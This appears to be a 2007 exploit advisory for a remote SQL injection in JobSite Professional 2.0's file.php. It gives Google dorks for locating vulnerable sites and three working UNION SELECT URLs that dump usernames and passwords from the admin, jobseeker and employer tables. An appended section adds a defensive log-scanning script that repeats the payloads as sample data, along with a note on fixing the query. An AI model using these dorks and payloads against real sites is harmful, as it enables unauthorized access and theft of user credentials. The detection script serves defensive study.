# Title : JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability
# Published : 2007-10-28
# Author : ZynbER


#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version  : inurl:index.php?page=fr_Candidats


## EXPLOITS :

The vulnerability is in the id parameter of file.php (file.php?id=)



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed!!
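
Added example, not part of the original advisory: a log check a site operator could run to find requests of the shape shown above in web server access logs. It assumes combined-format logs and that a legitimate file.php id is a plain non-negative integer; the sample log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Oct/2007:10:00:01 +0000] "GET /file.php?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Oct/2007:10:00:07 +0000] "GET /file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,'
    'CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/* HTTP/1.1" 200 312',
    '203.0.113.9 - - [28/Oct/2007:10:00:09 +0000] "GET /file.php?id=-1%20uNiOn%2F**%2FsElEcT%201 HTTP/1.1" 200 298',
    '198.51.100.2 - - [28/Oct/2007:10:01:00 +0000] "GET /index.php?page=en_jobseekers HTTP/1.1" 200 9000',
]

# Request line inside the quoted field of a combined-format log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_file_php_requests(lines):
    """Return (client_ip, decoded_id, reasons) for file.php requests
    whose id parameter is not a plain integer (assumed legitimate shape)."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/file.php"):
            continue
        # parse_qs URL-decodes the value, so %20 and + both become spaces.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if re.fullmatch(r"\d+", value):
                continue  # numeric record id: nothing to report
            # Drop inline SQL comments and case tricks before keyword checks.
            normalized = re.sub(r"/\*.*?\*/", " ", value).lower()
            reasons = ["non-numeric id"]
            if re.search(r"\bunion\b.*\bselect\b", normalized):
                reasons.append("UNION SELECT")
            if re.search(r"websiteadmin_\w+", normalized):
                reasons.append("application table name")
            findings.append((line.split()[0], value, reasons))
    return findings


if __name__ == "__main__":
    for ip, value, reasons in suspicious_file_php_requests(SAMPLE_LOG):
        print(ip, reasons, value[:60])
```

The log check only surfaces attempts; the fix belongs in file.php, where id should be cast to an integer or bound as a query parameter before it reaches the SQL statement.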



## GREETZ  :  MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa

# www.Syue.com [2007-10-28]